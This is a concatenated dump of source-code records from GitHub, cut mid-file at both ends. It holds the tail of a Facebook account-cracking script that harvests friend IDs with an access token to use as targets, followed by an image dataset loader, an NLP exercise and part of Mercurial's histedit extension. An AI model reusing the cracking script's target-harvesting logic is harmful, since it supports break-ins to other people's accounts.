script'%(N,O,N))\n\t\tprint(' %s[%sA%s] Keluar, hapus token'%(N,O,N))\n\t\tself.pilih()\n\tdef pilih(self):\n\n\t\tprint(' %s'%(N))\n\n\t\tusna = input(' %s[%s+%s] choose : '%(N,O,N))\n\n\t\tif usna in ['']:\n\n\t\t\tprint(' %s'%(N))\n\n\t\t\tprint(' %s[%s!%s] Jangan kosong mas'%(N,M,N));time.sleep(2);menu().main()\n\n\t\telif usna in ['0','00']:\n\n\t\t\ttry:\n\n\t\t\t\ttoken = open('token.x','r').read()\n\n\t\t\texcept IOError:\n\n\t\t\t\tos.system('rm -rf token.x')\n\n\t\t\t\texit(' %s[%s!%s] Cek token kamu'%(N,M,N))\n\n\t\t\ttry:\n\n\t\t\t\tlmt = input(' %s[%s+%s] Limit id : '%(N,O,N))\n\n\t\t\t\tr = 
requests.get('https://graph.facebook.com/me?fields=friends.limit(%s)&access_token=%s'%(lmt,token))\n\n\t\t\t\tz = json.loads(r.text)\n\n\t\t\t\tid = []\n\n\t\t\t\tfor w in z['friends']['data']:\n\n\t\t\t\t\tid.append(z['id'] + '<=>' + w['name'])\n\n\t\t\texcept KeyError:\n\n\t\t\t\tprint(' %s[%s!%s] Akun anda tidak publik...'%(N,M,N));time.sleep(2);menu().main()\n\n\t\t\telse:\n\n\t\t\t\tcrack().fbeh(id)\n\n\t\telif usna in ['1','01']:\n\n\t\t\ttry:\n\n\t\t\t\ttoken = open('token.x','r').read()\n\n\t\t\texcept IOError:\n\n\t\t\t\tos.system('rm -rf token.x')\n\n\t\t\t\texit(' %s[%s!%s] Coba jalankan ulang !'%(N,M,N))\n\n\t\t\ttry:\n\n\t\t\t\tprint(' %s'%(N))\n\n\t\t\t\tidt = input(' %s[%s•%s] Masukan id : '%(N,O,N))\n\n\t\t\t\tr = requests.get('https://graph.facebook.com/%s?fields=friends.limit(5001)&access_token=%s'%(idt,token))\n\n\t\t\t\te = json.loads(r.text)\n\n\t\t\t\tid = []\n\n\t\t\t\tfor u in e['friends']['data']:\n\n\t\t\t\t\tid.append(u['id'] + '<=>' + u['name'])\n\n\t\t\texcept KeyError:\n\n\t\t\t\tprint(' %s'%(N))\n\n\t\t\t\tjalan(' %s[%s•%s] ID %s tidak di temukan!'%(N,M,N,idt));time.sleep(2);menu().main()\n\n\t\t\telse:\n\n\t\t\t\tcrack().fbeh(id)\n\n\t\telif usna in ['2','02']:\n\n\t\t\t\texit()\n\nif __name__=='__main__':\n\tmenu()\n","repo_name":"Rudal-XD/crack-02","sub_path":"crack.py","file_name":"crack.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9865805330","text":"import os\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport torchvision as tv\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport numpy as np\n\nclass RealFakeDataset(Dataset):\n    def __init__(self, path_real, path_fake, split=\"train\", transform=None):\n\n        self.path_real = path_real\n        self.path_fake = path_fake\n        \n        self.real_images = sorted(os.listdir(self.path_real))\n        self.fake_images = sorted(os.listdir(self.path_fake))\n        self.real_images = [os.path.join(self.path_real, img) for img in self.real_images]\n        self.fake_images = [os.path.join(self.path_fake, img) for img in self.fake_images]\n\n        self.transform = transform\n\n        if split == \"train\":\n            self.real_images = self.real_images[:int(0.8*len(self.real_images))]\n            self.fake_images = self.fake_images[:int(0.8*len(self.fake_images))]\n        elif split == \"val\":\n            self.real_images = self.real_images[int(0.8*len(self.real_images)):]\n            self.fake_images = self.fake_images[int(0.8*len(self.fake_images)):]\n\n        assert len(self.real_images) == len(self.fake_images)\n\n        # Define an offset in indices for the fake images.\n        # The offset is reset every epoch to change the pairing\n        # while making each image appear once per epoch.\n        self.random_offset = np.random.randint(0, len(self.real_images))\n\n        self._cache = {}\n\n    def __len__(self):\n        return len(self.real_images)\n    \n    def __getitem__(self, idx):\n        real = self._cache_image_loader(self.real_images[idx])\n        # Shift by the offset modulo the dataset length so each fake image is\n        # used once per epoch (taking idx modulo the random value could divide\n        # by zero and would only ever reach the first few fake images).\n        fake = self._cache_image_loader(self.fake_images[(idx + self.random_offset) % len(self.fake_images)])\n\n        if self.transform:\n            real = self.transform(real)\n            fake = self.transform(fake)\n\n        return real, fake\n\n    def _cache_image_loader(self, path):\n        if not path in self._cache:\n            self._cache[path] = Image.open(path)\n        return self._cache[path]\n\ndef get_dataloaders(config):\n    train_ds = RealFakeDataset(\n        path_real=config.data.path_real,\n        path_fake=config.data.path_fake,\n        split=\"train\",\n        transform=tv.transforms.ToTensor()\n    )\n    val_ds = RealFakeDataset(\n        
path_real=config.data.path_real,\n path_fake=config.data.path_fake,\n split=\"val\",\n transform=tv.transforms.ToTensor()\n )\n\n if config.data.num_workers == \"auto\":\n config.data.num_workers = min(config.data.batch_size, os.cpu_count()//torch.cuda.device_count())\n\n train_dl = torch.utils.data.DataLoader(\n train_ds,\n batch_size=config.data.batch_size,\n shuffle=True,\n num_workers=config.data.num_workers,\n pin_memory=True,\n )\n\n val_dl = torch.utils.data.DataLoader(\n val_ds,\n batch_size=config.data.batch_size,\n shuffle=False,\n num_workers=config.data.num_workers,\n pin_memory=True,\n )\n\n return train_dl, val_dl\n","repo_name":"HReynaud/CycleGan_lightning","sub_path":"cyclegan_lightning/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"5562779042","text":"# -*- coding:utf-8 -*-\nfrom dependency_parse import DependencyParser\n\nsentences = DependencyParser.parse('neko.txt.cabocha')\nsentence = sentences[7]\nfor chunk in sentence:\n dst_surface = ''.join([morph.surface for morph in chunk.morphs if morph.pos != '記号'])\n\n src_surfaces = []\n for idx in chunk.srcs:\n src_chunk = sentence[idx]\n src_surface = ''.join([morph.surface for morph in src_chunk.morphs if morph.pos != '記号'])\n src_surfaces.append(src_surface)\n print('\\t'.join([dst_surface] + src_surfaces))","repo_name":"tarhashi/pynlp100","sub_path":"chapter5/42.py","file_name":"42.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18227393265","text":"from __future__ import absolute_import\n\n# chistedit dependencies that are not available everywhere\ntry:\n import fcntl\n import termios\nexcept ImportError:\n fcntl = None\n termios = None\n\nimport functools\nimport os\nimport struct\n\nfrom mercurial.i18n import _\nfrom mercurial.pycompat import (\n getattr,\n open,\n)\nfrom mercurial.node import (\n bin,\n hex,\n short,\n)\nfrom mercurial import (\n bundle2,\n cmdutil,\n context,\n copies,\n destutil,\n discovery,\n encoding,\n error,\n exchange,\n extensions,\n hg,\n logcmdutil,\n merge as mergemod,\n mergestate as mergestatemod,\n mergeutil,\n obsolete,\n pycompat,\n registrar,\n repair,\n rewriteutil,\n scmutil,\n state as statemod,\n util,\n)\nfrom mercurial.utils import (\n dateutil,\n stringutil,\n urlutil,\n)\n\npickle = util.pickle\ncmdtable = {}\ncommand = registrar.command(cmdtable)\n\nconfigtable = {}\nconfigitem = registrar.configitem(configtable)\nconfigitem(\n b'experimental',\n b'histedit.autoverb',\n default=False,\n)\nconfigitem(\n b'histedit',\n b'defaultrev',\n default=None,\n)\nconfigitem(\n b'histedit',\n b'dropmissing',\n default=False,\n)\nconfigitem(\n b'histedit',\n b'linelen',\n default=80,\n)\nconfigitem(\n b'histedit',\n b'singletransaction',\n default=False,\n)\nconfigitem(\n b'ui',\n b'interface.histedit',\n default=None,\n)\nconfigitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')\n\n# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for\n# extensions which SHIP WITH MERCURIAL. 
Non-mainline extensions should\n# be specifying the version(s) of Mercurial they are tested with, or\n# leave the attribute unspecified.\ntestedwith = b'ships-with-hg-core'\n\nactiontable = {}\nprimaryactions = set()\nsecondaryactions = set()\ntertiaryactions = set()\ninternalactions = set()\n\n\ndef geteditcomment(ui, first, last):\n \"\"\"construct the editor comment\n The comment includes::\n - an intro\n - sorted primary commands\n - sorted short commands\n - sorted long commands\n - additional hints\n\n Commands are only included once.\n \"\"\"\n intro = _(\n b\"\"\"Edit history between %s and %s\n\nCommits are listed from least to most recent\n\nYou can reorder changesets by reordering the lines\n\nCommands:\n\"\"\"\n )\n actions = []\n\n def addverb(v):\n a = actiontable[v]\n lines = a.message.split(b\"\\n\")\n if len(a.verbs):\n v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))\n actions.append(b\" %s = %s\" % (v, lines[0]))\n actions.extend([b' %s'] * (len(lines) - 1))\n\n for v in (\n sorted(primaryactions)\n + sorted(secondaryactions)\n + sorted(tertiaryactions)\n ):\n addverb(v)\n actions.append(b'')\n\n hints = []\n if ui.configbool(b'histedit', b'dropmissing'):\n hints.append(\n b\"Deleting a changeset from the list \"\n b\"will DISCARD it from the edited history!\"\n )\n\n lines = (intro % (first, last)).split(b'\\n') + actions + hints\n\n return b''.join([b'# %s\\n' % l if l else b'#\\n' for l in lines])\n\n\nclass histeditstate(object):\n def __init__(self, repo):\n self.repo = repo\n self.actions = None\n self.keep = None\n self.topmost = None\n self.parentctxnode = None\n self.lock = None\n self.wlock = None\n self.backupfile = None\n self.stateobj = statemod.cmdstate(repo, b'histedit-state')\n self.replacements = []\n\n def read(self):\n \"\"\"Load histedit state from disk and set fields appropriately.\"\"\"\n if not self.stateobj.exists():\n cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))\n\n data = self._read()\n\n self.parentctxnode = data[b'parentctxnode']\n actions = parserules(data[b'rules'], self)\n self.actions = actions\n self.keep = data[b'keep']\n self.topmost = data[b'topmost']\n self.replacements = data[b'replacements']\n self.backupfile = data[b'backupfile']\n\n def _read(self):\n fp = self.repo.vfs.read(b'histedit-state')\n if fp.startswith(b'v1\\n'):\n data = self._load()\n parentctxnode, rules, keep, topmost, replacements, backupfile = data\n else:\n data = pickle.loads(fp)\n parentctxnode, rules, keep, topmost, replacements = data\n backupfile = None\n rules = b\"\\n\".join([b\"%s %s\" % (verb, rest) for [verb, rest] in rules])\n\n return {\n b'parentctxnode': parentctxnode,\n b\"rules\": rules,\n b\"keep\": keep,\n b\"topmost\": topmost,\n b\"replacements\": replacements,\n b\"backupfile\": backupfile,\n }\n\n def write(self, tr=None):\n if tr:\n tr.addfilegenerator(\n b'histedit-state',\n (b'histedit-state',),\n self._write,\n location=b'plain',\n )\n else:\n with self.repo.vfs(b\"histedit-state\", b\"w\") as f:\n self._write(f)\n\n def _write(self, fp):\n fp.write(b'v1\\n')\n fp.write(b'%s\\n' % hex(self.parentctxnode))\n fp.write(b'%s\\n' % hex(self.topmost))\n fp.write(b'%s\\n' % (b'True' if self.keep else b'False'))\n fp.write(b'%d\\n' % len(self.actions))\n for action in self.actions:\n fp.write(b'%s\\n' % action.tostate())\n fp.write(b'%d\\n' % len(self.replacements))\n for replacement in self.replacements:\n fp.write(\n b'%s%s\\n'\n % (\n hex(replacement[0]),\n b''.join(hex(r) for r in replacement[1]),\n )\n )\n backupfile = 
self.backupfile\n if not backupfile:\n backupfile = b''\n fp.write(b'%s\\n' % backupfile)\n\n def _load(self):\n fp = self.repo.vfs(b'histedit-state', b'r')\n lines = [l[:-1] for l in fp.readlines()]\n\n index = 0\n lines[index] # version number\n index += 1\n\n parentctxnode = bin(lines[index])\n index += 1\n\n topmost = bin(lines[index])\n index += 1\n\n keep = lines[index] == b'True'\n index += 1\n\n # Rules\n rules = []\n rulelen = int(lines[index])\n index += 1\n for i in pycompat.xrange(rulelen):\n ruleaction = lines[index]\n index += 1\n rule = lines[index]\n index += 1\n rules.append((ruleaction, rule))\n\n # Replacements\n replacements = []\n replacementlen = int(lines[index])\n index += 1\n for i in pycompat.xrange(replacementlen):\n replacement = lines[index]\n original = bin(replacement[:40])\n succ = [\n bin(replacement[i : i + 40])\n for i in range(40, len(replacement), 40)\n ]\n replacements.append((original, succ))\n index += 1\n\n backupfile = lines[index]\n index += 1\n\n fp.close()\n\n return parentctxnode, rules, keep, topmost, replacements, backupfile\n\n def clear(self):\n if self.inprogress():\n self.repo.vfs.unlink(b'histedit-state')\n\n def inprogress(self):\n return self.repo.vfs.exists(b'histedit-state')\n\n\nclass histeditaction(object):\n def __init__(self, state, node):\n self.state = state\n self.repo = state.repo\n self.node = node\n\n @classmethod\n def fromrule(cls, state, rule):\n \"\"\"Parses the given rule, returning an instance of the histeditaction.\"\"\"\n ruleid = rule.strip().split(b' ', 1)[0]\n # ruleid can be anything from rev numbers, hashes, \"bookmarks\" etc\n # Check for validation of rule ids and get the rulehash\n try:\n rev = bin(ruleid)\n except TypeError:\n try:\n _ctx = scmutil.revsingle(state.repo, ruleid)\n rulehash = _ctx.hex()\n rev = bin(rulehash)\n except error.RepoLookupError:\n raise error.ParseError(_(b\"invalid changeset %s\") % ruleid)\n return cls(state, rev)\n\n def verify(self, prev, expected, seen):\n \"\"\"Verifies semantic correctness of the rule\"\"\"\n repo = self.repo\n ha = hex(self.node)\n self.node = scmutil.resolvehexnodeidprefix(repo, ha)\n if self.node is None:\n raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])\n self._verifynodeconstraints(prev, expected, seen)\n\n def _verifynodeconstraints(self, prev, expected, seen):\n # by default command need a node in the edited list\n if self.node not in expected:\n raise error.ParseError(\n _(b'%s \"%s\" changeset was not a candidate')\n % (self.verb, short(self.node)),\n hint=_(b'only use listed changesets'),\n )\n # and only one command per node\n if self.node in seen:\n raise error.ParseError(\n _(b'duplicated command for changeset %s') % short(self.node)\n )\n\n def torule(self):\n \"\"\"build a histedit rule line for an action\n\n by default lines are in the form:\n \n \"\"\"\n ctx = self.repo[self.node]\n ui = self.repo.ui\n # We don't want color codes in the commit message template, so\n # disable the label() template function while we render it.\n with ui.configoverride(\n {(b'templatealias', b'label(l,x)'): b\"x\"}, b'histedit'\n ):\n summary = cmdutil.rendertemplate(\n ctx, ui.config(b'histedit', b'summary-template')\n )\n # Handle the fact that `''.splitlines() => []`\n summary = summary.splitlines()[0] if summary else b''\n line = b'%s %s %s' % (self.verb, ctx, summary)\n # trim to 75 columns by default so it's not stupidly wide in my editor\n # (the 5 more are left for verb)\n maxlen = self.repo.ui.configint(b'histedit', b'linelen')\n 
maxlen = max(maxlen, 22) # avoid truncating hash\n return stringutil.ellipsis(line, maxlen)\n\n def tostate(self):\n \"\"\"Print an action in format used by histedit state files\n (the first line is a verb, the remainder is the second)\n \"\"\"\n return b\"%s\\n%s\" % (self.verb, hex(self.node))\n\n def run(self):\n \"\"\"Runs the action. The default behavior is simply apply the action's\n rulectx onto the current parentctx.\"\"\"\n self.applychange()\n self.continuedirty()\n return self.continueclean()\n\n def applychange(self):\n \"\"\"Applies the changes from this action's rulectx onto the current\n parentctx, but does not commit them.\"\"\"\n repo = self.repo\n rulectx = repo[self.node]\n with repo.ui.silent():\n hg.update(repo, self.state.parentctxnode, quietempty=True)\n stats = applychanges(repo.ui, repo, rulectx, {})\n repo.dirstate.setbranch(rulectx.branch())\n if stats.unresolvedcount:\n raise error.InterventionRequired(\n _(b'Fix up the change (%s %s)') % (self.verb, short(self.node)),\n hint=_(b'hg histedit --continue to resume'),\n )\n\n def continuedirty(self):\n \"\"\"Continues the action when changes have been applied to the working\n copy. The default behavior is to commit the dirty changes.\"\"\"\n repo = self.repo\n rulectx = repo[self.node]\n\n editor = self.commiteditor()\n commit = commitfuncfor(repo, rulectx)\n if repo.ui.configbool(b'rewrite', b'update-timestamp'):\n date = dateutil.makedate()\n else:\n date = rulectx.date()\n commit(\n text=rulectx.description(),\n user=rulectx.user(),\n date=date,\n extra=rulectx.extra(),\n editor=editor,\n )\n\n def commiteditor(self):\n \"\"\"The editor to be used to edit the commit message.\"\"\"\n return False\n\n def continueclean(self):\n \"\"\"Continues the action when the working copy is clean. 
The default\n behavior is to accept the current commit as the new version of the\n rulectx.\"\"\"\n ctx = self.repo[b'.']\n if ctx.node() == self.state.parentctxnode:\n self.repo.ui.warn(\n _(b'%s: skipping changeset (no changes)\\n') % short(self.node)\n )\n return ctx, [(self.node, tuple())]\n if ctx.node() == self.node:\n # Nothing changed\n return ctx, []\n return ctx, [(self.node, (ctx.node(),))]\n\n\ndef commitfuncfor(repo, src):\n \"\"\"Build a commit function for the replacement of \n\n This function ensure we apply the same treatment to all changesets.\n\n - Add a 'histedit_source' entry in extra.\n\n Note that fold has its own separated logic because its handling is a bit\n different and not easily factored out of the fold method.\n \"\"\"\n phasemin = src.phase()\n\n def commitfunc(**kwargs):\n overrides = {(b'phases', b'new-commit'): phasemin}\n with repo.ui.configoverride(overrides, b'histedit'):\n extra = kwargs.get('extra', {}).copy()\n extra[b'histedit_source'] = src.hex()\n kwargs['extra'] = extra\n return repo.commit(**kwargs)\n\n return commitfunc\n\n\ndef applychanges(ui, repo, ctx, opts):\n \"\"\"Merge changeset from ctx (only) in the current working directory\"\"\"\n if ctx.p1().node() == repo.dirstate.p1():\n # edits are \"in place\" we do not need to make any merge,\n # just applies changes on parent for editing\n with ui.silent():\n cmdutil.revert(ui, repo, ctx, all=True)\n stats = mergemod.updateresult(0, 0, 0, 0)\n else:\n try:\n # ui.forcemerge is an internal variable, do not document\n repo.ui.setconfig(\n b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'\n )\n stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])\n finally:\n repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')\n return stats\n\n\ndef collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):\n \"\"\"collapse the set of revisions from first to last as new one.\n\n Expected commit options are:\n - message\n - date\n - username\n Commit message is edited in all cases.\n\n This function works in memory.\"\"\"\n ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))\n if not ctxs:\n return None\n for c in ctxs:\n if not c.mutable():\n raise error.ParseError(\n _(b\"cannot fold into public change %s\") % short(c.node())\n )\n base = firstctx.p1()\n\n # commit a new version of the old changeset, including the update\n # collect all files which might be affected\n files = set()\n for ctx in ctxs:\n files.update(ctx.files())\n\n # Recompute copies (avoid recording a -> b -> a)\n copied = copies.pathcopies(base, lastctx)\n\n # prune files which were reverted by the updates\n files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]\n # commit version of these files as defined by head\n headmf = lastctx.manifest()\n\n def filectxfn(repo, ctx, path):\n if path in headmf:\n fctx = lastctx[path]\n flags = fctx.flags()\n mctx = context.memfilectx(\n repo,\n ctx,\n fctx.path(),\n fctx.data(),\n islink=b'l' in flags,\n isexec=b'x' in flags,\n copysource=copied.get(path),\n )\n return mctx\n return None\n\n if commitopts.get(b'message'):\n message = commitopts[b'message']\n else:\n message = firstctx.description()\n user = commitopts.get(b'user')\n date = commitopts.get(b'date')\n extra = commitopts.get(b'extra')\n\n parents = (firstctx.p1().node(), firstctx.p2().node())\n editor = None\n if not skipprompt:\n editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')\n new = context.memctx(\n repo,\n parents=parents,\n text=message,\n 
files=files,\n filectxfn=filectxfn,\n user=user,\n date=date,\n extra=extra,\n editor=editor,\n )\n return repo.commitctx(new)\n\n\ndef _isdirtywc(repo):\n return repo[None].dirty(missing=True)\n\n\ndef abortdirty():\n raise error.Abort(\n _(b'working copy has pending changes'),\n hint=_(\n b'amend, commit, or revert them and run histedit '\n b'--continue, or abort with histedit --abort'\n ),\n )\n\n\ndef action(verbs, message, priority=False, internal=False):\n def wrap(cls):\n assert not priority or not internal\n verb = verbs[0]\n if priority:\n primaryactions.add(verb)\n elif internal:\n internalactions.add(verb)\n elif len(verbs) > 1:\n secondaryactions.add(verb)\n else:\n tertiaryactions.add(verb)\n\n cls.verb = verb\n cls.verbs = verbs\n cls.message = message\n for verb in verbs:\n actiontable[verb] = cls\n return cls\n\n return wrap\n\n\n@action([b'pick', b'p'], _(b'use commit'), priority=True)\nclass pick(histeditaction):\n def run(self):\n rulectx = self.repo[self.node]\n if rulectx.p1().node() == self.state.parentctxnode:\n self.repo.ui.debug(b'node %s unchanged\\n' % short(self.node))\n return rulectx, []\n\n return super(pick, self).run()\n\n\n@action(\n [b'edit', b'e'],\n _(b'use commit, but allow edits before making new commit'),\n priority=True,\n)\nclass edit(histeditaction):\n def run(self):\n repo = self.repo\n rulectx = repo[self.node]\n hg.update(repo, self.state.parentctxnode, quietempty=True)\n applychanges(repo.ui, repo, rulectx, {})\n hint = _(b'to edit %s, `hg histedit --continue` after making changes')\n raise error.InterventionRequired(\n _(b'Editing (%s), commit as needed now to split the change')\n % short(self.node),\n hint=hint % short(self.node),\n )\n\n def commiteditor(self):\n return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')\n\n\n@action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))\nclass fold(histeditaction):\n def verify(self, prev, expected, seen):\n \"\"\"Verifies semantic correctness of the fold rule\"\"\"\n super(fold, self).verify(prev, expected, seen)\n repo = self.repo\n if not prev:\n c = repo[self.node].p1()\n elif not prev.verb in (b'pick', b'base'):\n return\n else:\n c = repo[prev.node]\n if not c.mutable():\n raise error.ParseError(\n _(b\"cannot fold into public change %s\") % short(c.node())\n )\n\n def continuedirty(self):\n repo = self.repo\n rulectx = repo[self.node]\n\n commit = commitfuncfor(repo, rulectx)\n commit(\n text=b'fold-temp-revision %s' % short(self.node),\n user=rulectx.user(),\n date=rulectx.date(),\n extra=rulectx.extra(),\n )\n\n def continueclean(self):\n repo = self.repo\n ctx = repo[b'.']\n rulectx = repo[self.node]\n parentctxnode = self.state.parentctxnode\n if ctx.node() == parentctxnode:\n repo.ui.warn(_(b'%s: empty changeset\\n') % short(self.node))\n return ctx, [(self.node, (parentctxnode,))]\n\n parentctx = repo[parentctxnode]\n newcommits = {\n c.node()\n for c in repo.set(b'(%d::. 
- %d)', parentctx.rev(), parentctx.rev())\n }\n if not newcommits:\n repo.ui.warn(\n _(\n b'%s: cannot fold - working copy is not a '\n b'descendant of previous commit %s\\n'\n )\n % (short(self.node), short(parentctxnode))\n )\n return ctx, [(self.node, (ctx.node(),))]\n\n middlecommits = newcommits.copy()\n middlecommits.discard(ctx.node())\n\n return self.finishfold(\n repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits\n )\n\n def skipprompt(self):\n \"\"\"Returns true if the rule should skip the message editor.\n\n For example, 'fold' wants to show an editor, but 'rollup'\n doesn't want to.\n \"\"\"\n return False\n\n def mergedescs(self):\n \"\"\"Returns true if the rule should merge messages of multiple changes.\n\n This exists mainly so that 'rollup' rules can be a subclass of\n 'fold'.\n \"\"\"\n return True\n\n def firstdate(self):\n \"\"\"Returns true if the rule should preserve the date of the first\n change.\n\n This exists mainly so that 'rollup' rules can be a subclass of\n 'fold'.\n \"\"\"\n return False\n\n def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):\n mergemod.update(ctx.p1())\n ### prepare new commit data\n commitopts = {}\n commitopts[b'user'] = ctx.user()\n # commit message\n if not self.mergedescs():\n newmessage = ctx.description()\n else:\n newmessage = (\n b'\\n***\\n'.join(\n [ctx.description()]\n + [repo[r].description() for r in internalchanges]\n + [oldctx.description()]\n )\n + b'\\n'\n )\n commitopts[b'message'] = newmessage\n # date\n if self.firstdate():\n commitopts[b'date'] = ctx.date()\n else:\n commitopts[b'date'] = max(ctx.date(), oldctx.date())\n # if date is to be updated to current\n if ui.configbool(b'rewrite', b'update-timestamp'):\n commitopts[b'date'] = dateutil.makedate()\n\n extra = ctx.extra().copy()\n # histedit_source\n # note: ctx is likely a temporary commit but that the best we can do\n # here. This is sufficient to solve issue3681 anyway.\n extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())\n commitopts[b'extra'] = extra\n phasemin = max(ctx.phase(), oldctx.phase())\n overrides = {(b'phases', b'new-commit'): phasemin}\n with repo.ui.configoverride(overrides, b'histedit'):\n n = collapse(\n repo,\n ctx,\n repo[newnode],\n commitopts,\n skipprompt=self.skipprompt(),\n )\n if n is None:\n return ctx, []\n mergemod.update(repo[n])\n replacements = [\n (oldctx.node(), (newnode,)),\n (ctx.node(), (n,)),\n (newnode, (n,)),\n ]\n for ich in internalchanges:\n replacements.append((ich, (n,)))\n return repo[n], replacements\n\n\n@action(\n [b'base', b'b'],\n _(b'checkout changeset and apply further changesets from there'),\n)\nclass base(histeditaction):\n def run(self):\n if self.repo[b'.'].node() != self.node:\n mergemod.clean_update(self.repo[self.node])\n return self.continueclean()\n\n def continuedirty(self):\n abortdirty()\n\n def continueclean(self):\n basectx = self.repo[b'.']\n return basectx, []\n\n def _verifynodeconstraints(self, prev, expected, seen):\n # base can only be use with a node not in the edited set\n if self.node in expected:\n msg = _(b'%s \"%s\" changeset was an edited list candidate')\n raise error.ParseError(\n msg % (self.verb, short(self.node)),\n hint=_(b'base must only use unlisted changesets'),\n )\n\n\n@action(\n [b'_multifold'],\n _(\n \"\"\"fold subclass used for when multiple folds happen in a row\n\n We only want to fire the editor for the folded message once when\n (say) four changes are folded down into a single change. 
This is\n similar to rollup, but we should preserve both messages so that\n when the last fold operation runs we can show the user all the\n commit messages in their editor.\n \"\"\"\n ),\n internal=True,\n)\nclass _multifold(fold):\n def skipprompt(self):\n return True\n\n\n@action(\n [b\"roll\", b\"r\"],\n _(b\"like fold, but discard this commit's description and date\"),\n)\nclass rollup(fold):\n def mergedescs(self):\n return False\n\n def skipprompt(self):\n return True\n\n def firstdate(self):\n return True\n\n\n@action([b\"drop\", b\"d\"], _(b'remove commit from history'))\nclass drop(histeditaction):\n def run(self):\n parentctx = self.repo[self.state.parentctxnode]\n return parentctx, [(self.node, tuple())]\n\n\n@action(\n [b\"mess\", b\"m\"],\n _(b'edit commit message without changing commit content'),\n priority=True,\n)\nclass message(histeditaction):\n def commiteditor(self):\n return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')\n\n\ndef findoutgoing(ui, repo, remote=None, force=False, opts=None):\n \"\"\"utility function to find the first outgoing changeset\n\n Used by initialization code\"\"\"\n if opts is None:\n opts = {}\n path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote)\n dest = path.pushloc or path.loc\n\n ui.status(_(b'comparing with %s\\n') % urlutil.hidepassword(dest))\n\n revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None)\n other = hg.peer(repo, opts, dest)\n\n if revs:\n revs = [repo.lookup(rev) for rev in revs]\n\n outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)\n if not outgoing.missing:\n raise error.Abort(_(b'no outgoing ancestors'))\n roots = list(repo.revs(b\"roots(%ln)\", outgoing.missing))\n if len(roots) > 1:\n msg = _(b'there are ambiguous outgoing revisions')\n hint = _(b\"see 'hg help histedit' for more detail\")\n raise error.Abort(msg, hint=hint)\n return repo[roots[0]].node()\n\n\n# Curses Support\ntry:\n import curses\nexcept ImportError:\n curses = None\n\nKEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']\nACTION_LABELS = {\n b'fold': b'^fold',\n b'roll': b'^roll',\n}\n\nCOLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5\nCOLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8\nCOLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11\n\nE_QUIT, E_HISTEDIT = 1, 2\nE_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7\nMODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3\n\nKEYTABLE = {\n b'global': {\n b'h': b'next-action',\n b'KEY_RIGHT': b'next-action',\n b'l': b'prev-action',\n b'KEY_LEFT': b'prev-action',\n b'q': b'quit',\n b'c': b'histedit',\n b'C': b'histedit',\n b'v': b'showpatch',\n b'?': b'help',\n },\n MODE_RULES: {\n b'd': b'action-drop',\n b'e': b'action-edit',\n b'f': b'action-fold',\n b'm': b'action-mess',\n b'p': b'action-pick',\n b'r': b'action-roll',\n b' ': b'select',\n b'j': b'down',\n b'k': b'up',\n b'KEY_DOWN': b'down',\n b'KEY_UP': b'up',\n b'J': b'move-down',\n b'K': b'move-up',\n b'KEY_NPAGE': b'move-down',\n b'KEY_PPAGE': b'move-up',\n b'0': b'goto', # Used for 0..9\n },\n MODE_PATCH: {\n b' ': b'page-down',\n b'KEY_NPAGE': b'page-down',\n b'KEY_PPAGE': b'page-up',\n b'j': b'line-down',\n b'k': b'line-up',\n b'KEY_DOWN': b'line-down',\n b'KEY_UP': b'line-up',\n b'J': b'down',\n b'K': b'up',\n },\n MODE_HELP: {},\n}\n\n\ndef screen_size():\n return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))\n\n\nclass histeditrule(object):\n def __init__(self, 
